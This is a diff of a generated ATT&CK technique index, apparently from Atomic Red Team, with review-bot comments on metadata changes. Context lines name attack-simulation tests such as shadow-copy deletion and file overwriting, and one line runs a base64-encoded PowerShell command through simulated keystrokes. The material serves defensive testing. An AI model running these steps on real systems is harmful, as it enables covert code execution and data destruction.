- description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
- Retrieved October 8, 2019.
- url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
- - source_name: Sysdig Proxyjacking
- description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
- Chat. Retrieved July 6, 2023.
- url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
- - source_name: Kaspersky Lazarus Under The Hood Blog 2017
- description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
- 17, 2019.
- url: https://securelist.com/lazarus-under-the-hood/77908/
- - source_name: Trend Micro Exposed Docker APIs
- description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
- via Exposed APIs. Retrieved April 6, 2021.
- url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
- - source_name: Trend Micro War of Crypto Miners
- description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
- Miners: A Battle for Resources. Retrieved April 6, 2021.'
- url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
- - source_name: GoBotKR
- description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
- Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
- url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ - source_name: Sysdig Cryptojacking Proxyjacking 2023
+ description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+ and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1496
atomic_tests:
- name: FreeBSD/macOS/Linux - Simulate CPU Load with Yes
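Review bot: two points in this hunk. The new "Sysdig Cryptojacking Proxyjacking 2023" reference carries a stray space before the period in 'Targeting GitLab .'; that is upstream text, so fix it there rather than in the generated file. More substantively, the parent T1496 description is now a summary of four hijacking forms and the cryptomining-specific text has moved to T1496.001, yet the 'FreeBSD/macOS/Linux - Simulate CPU Load with Yes' test stays keyed under T1496 while T1496.001 is added with `atomic_tests: []`. That mirrors whatever technique ID the atomic itself declares, so it is not wrong here, but it is worth deciding in a follow-up whether the CPU-load atomics should be re-tagged to the Compute Hijacking sub-technique so the index reflects the new granularity.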
@@ -115657,62 +116596,61 @@ impact:
name: sh
T1565.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
- created: '2020-03-02T14:27:00.693Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1565.002
- url: https://attack.mitre.org/techniques/T1565/002
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- - source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
- description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:33:33.983Z'
+ name: Transmitted Data Manipulation
description: |-
Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Transmitted Data Manipulation
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
can be difficult without the appropriate tools. In some cases integrity verification
checks, such as file hashing, may be used on critical files as they transit
a network. With some critical processes involving transmission of data, manual
or out-of-band integrity checking may be useful for identifying manipulated
data. '
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Integrity
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+ created: '2020-03-02T14:27:00.693Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/002
+ external_id: T1565.002
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1485:
technique:
- modified: '2023-10-03T17:30:32.192Z'
+ modified: '2024-09-25T20:46:14.641Z'
name: Data Destruction
description: |-
Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del
and rm
often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
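Review bot: the T1565.002 block here is a pure key reorder plus the FireEye APT38 URL moving from content.fireeye.com to the mandiant.com PDF; nothing functional changes. Two upstream typos survive in the unchanged context: 'where there is an opportunity deploy a tool' (missing 'to') in the description and 'as at passes over a network' ('as it passes') in x_mitre_detection. Neither is introduced by this change, but since the text is being refreshed from the ATT&CK bundle anyway they are worth reporting upstream instead of patching the generated file.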
@@ -115721,7 +116659,7 @@ impact:
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
- In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
+ In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -115747,9 +116685,10 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Snapshot: Snapshot Deletion'
+ - 'Cloud Storage: Cloud Storage Modification'
- 'Process: Process Creation'
- 'File: File Deletion'
- 'Image: Image Deletion'
@@ -115805,7 +116744,6 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1485
atomic_tests:
- name: Windows - Overwrite file with SysInternals SDelete
@@ -115949,50 +116887,7 @@ impact:
terraform apply -auto-approve
T1498:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- - Containers
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Yossi Weizman, Azure Defender Research Team
- - Vishwas Manral, McAfee
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
- type: attack-pattern
- created: '2019-04-17T20:23:15.105Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1498
- url: https://attack.mitre.org/techniques/T1498
- - source_name: FireEye OpPoisonedHandover February 2016
- url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
- description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
- 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
- Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
- - source_name: FSISAC FraudNetDoS September 2012
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
- Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- - source_name: Symantec DDoS October 2014
- url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
- description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
- Retrieved April 24, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T16:01:00.510Z'
name: Network Denial of Service
description: |-
Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -116007,6 +116902,10 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_contributors:
+ - Yossi Weizman, Azure Defender Research Team
+ - Vishwas Manral, McAfee
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
service, but such response time typically requires very aggressive monitoring
@@ -116019,16 +116918,52 @@ impact:
may be small and the indicator of an event availability of the network or
service drops. The analysis tools mentioned can then be used to determine
the type of DoS causing the outage and help with remediation.'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
x_mitre_impact_type:
- Availability
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+ created: '2019-04-17T20:23:15.105Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1498
+ external_id: T1498
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: FSISAC FraudNetDoS September 2012
+ description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+ Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ - source_name: FireEye OpPoisonedHandover February 2016
+ description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+ 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+ Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+ url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+ - source_name: Symantec DDoS October 2014
+ description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+ Retrieved April 24, 2019.
+ url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1495:
technique:
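Review bot: the T1498 fields removed in the earlier `@@ -115949,50 +116887,7 @@` hunk are re-added here in the generator's new key order, so most of the 50-line removal and 52-line addition is movement. The substantive changes worth checking are: platforms reduced to Windows, IaaS, Linux, macOS, Containers (Azure AD, Office 365, SaaS, Google Workspace dropped); x_mitre_version 1.1 to 1.2; x_mitre_attack_spec_version 2.1.0 to 3.2.0; `revoked: false` and `x_mitre_deprecated: false` added; and the FSISAC URL and retrieval date updated to the ic3.gov Media/PDF path also used for T1499. Listing those in the commit message would save reviewers from diffing the two blocks by hand.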
@@ -116096,11 +117031,10 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1490:
technique:
- modified: '2024-04-12T02:30:08.379Z'
+ modified: '2024-09-24T13:27:31.881Z'
name: Inhibit System Recovery
description: |-
Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -116118,7 +117052,7 @@ impact:
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
- Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+ Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -116145,7 +117079,7 @@ impact:
- Network
- IaaS
- Containers
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Modification'
@@ -116195,13 +117129,12 @@ impact:
url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
- source_name: disable_notif_synology_ransom
description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
- servers before ransom. Retrieved October 19, 2022.
- url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+ servers before ransom. Retrieved September 12, 2024.
+ url: https://x.com/TheDFIRReport/status/1498657590259109894
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1490
atomic_tests:
- name: Windows - Delete Volume Shadow Copies
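Review bot: the `- spec_version: '2.1'` deletion (the line just above `identifier: T1490`) removes a property that STIX 2.1 requires on every object, and the same deletion is repeated on almost every technique object in this patch; if the generator now deliberately strips it, state that in the commit message and confirm nothing that parses this YAML reads `spec_version`. The reference refresh from twitter.com to x.com with a new Retrieved date is a reasonable dead-link fix and needs no change.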
@@ -116484,11 +117417,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1529:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T20:45:22.531Z'
name: System Shutdown/Reboot
description: |-
Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload
).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
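Review bot: the `modified` timestamp for T1529 moves backwards in this hunk (`2023-05-09T14:00:00.188Z` to `2023-03-22T20:45:22.531Z`), and the same regression appears for T1133, Compromise Hardware Supply Chain, Compromise Software Supply Chain, T1200 and T1029 elsewhere in the patch, on objects whose other fields are untouched. That pattern suggests the new run was generated from a different upstream snapshot than the previous one rather than from newer data. Name the ATT&CK release the regenerated data comes from in the PR description so a later sync does not flip these dates back again.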
@@ -116553,7 +117485,6 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1529
atomic_tests:
- name: Shutdown System - Windows
@@ -116829,7 +117760,7 @@ impact:
initial-access:
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -116907,7 +117838,6 @@ initial-access:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests:
- name: Running Chrome VPN Extensions via the Registry 2 vpn extension
@@ -117003,11 +117933,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566.002:
technique:
- modified: '2024-04-15T23:51:25.037Z'
+ modified: '2024-10-15T16:06:32.591Z'
name: 'Phishing: Spearphishing Link'
description: |-
Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -117046,10 +117975,10 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '2.6'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
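Review bot: the T1566.002 platform list replaces `Office 365` and `Google Workspace` with `Identity Provider` and `Office Suite`, and the same consolidation is applied to the other techniques in this patch. Anything keyed on the old platform names, such as per-platform index files, has to be regenerated in the same change or it will silently stop matching these techniques; a one-line note in the commit message that this follows the upstream platform rename rather than a local edit would also help the next reader.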
@@ -117066,7 +117995,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: CISA IDN ST05-016
description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
Internationalized Domain Names. Retrieved October 20, 2020.'
@@ -117105,7 +118034,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.002
atomic_tests:
- name: Paste and run technique
@@ -117152,7 +118080,7 @@ initial-access:
[System.Windows.Forms.SendKeys]::SendWait("cmd /c powershell -ec " + [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('#{execution_command}')) + "{ENTER}")
T1566.001:
technique:
- modified: '2024-01-31T14:09:27.066Z'
+ modified: '2024-10-15T16:42:01.552Z'
name: 'Phishing: Spearphishing Attachment'
description: "Adversaries may send spearphishing emails with a malicious attachment
in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -117214,7 +118142,7 @@ initial-access:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Unit 42 DarkHydrus July 2018
description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
Targets Middle East Government. Retrieved August 2, 2018.
@@ -117231,7 +118159,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1566.001
atomic_tests:
- name: Download Macro-Enabled Phishing Attachment
@@ -117322,7 +118249,7 @@ initial-access:
the adversary a high degree of control over the system. Hardware backdoors
may be inserted into various devices, such as servers, workstations, network
infrastructure, or peripherals.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:05:10.755Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Compromise Hardware Supply Chain
x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -117336,7 +118263,6 @@ initial-access:
- 'Sensor Health: Host Status'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1091:
technique:
@@ -117399,7 +118325,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests:
- name: USB Malware Spread Simulation
@@ -117426,7 +118351,7 @@ initial-access:
}
T1195:
technique:
- modified: '2024-02-26T14:23:37.009Z'
+ modified: '2024-10-04T11:17:00.778Z'
name: Supply Chain Compromise
description: "Adversaries may manipulate products or product delivery mechanisms
prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -117501,7 +118426,7 @@ initial-access:
description: Schneider Electric. (2018, August 24). Security Notification
– USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
Retrieved May 28, 2019.
- url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+ url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
- source_name: Trendmicro NPM Compromise
description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -117515,7 +118440,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1195
atomic_tests:
- name: Octopus Scanner Malware Open Source Supply Chain
@@ -117553,14 +118477,14 @@ initial-access:
name: command_prompt
T1190:
technique:
- modified: '2023-11-28T21:27:35.373Z'
+ modified: '2024-09-24T14:33:53.433Z'
name: Exploit Public-Facing Application
description: |-
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
- Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+ Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
- If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+ If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
@@ -117586,7 +118510,7 @@ initial-access:
- Linux
- macOS
- Containers
- x_mitre_version: '2.5'
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -117641,7 +118565,6 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1659:
technique:
@@ -117704,11 +118627,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
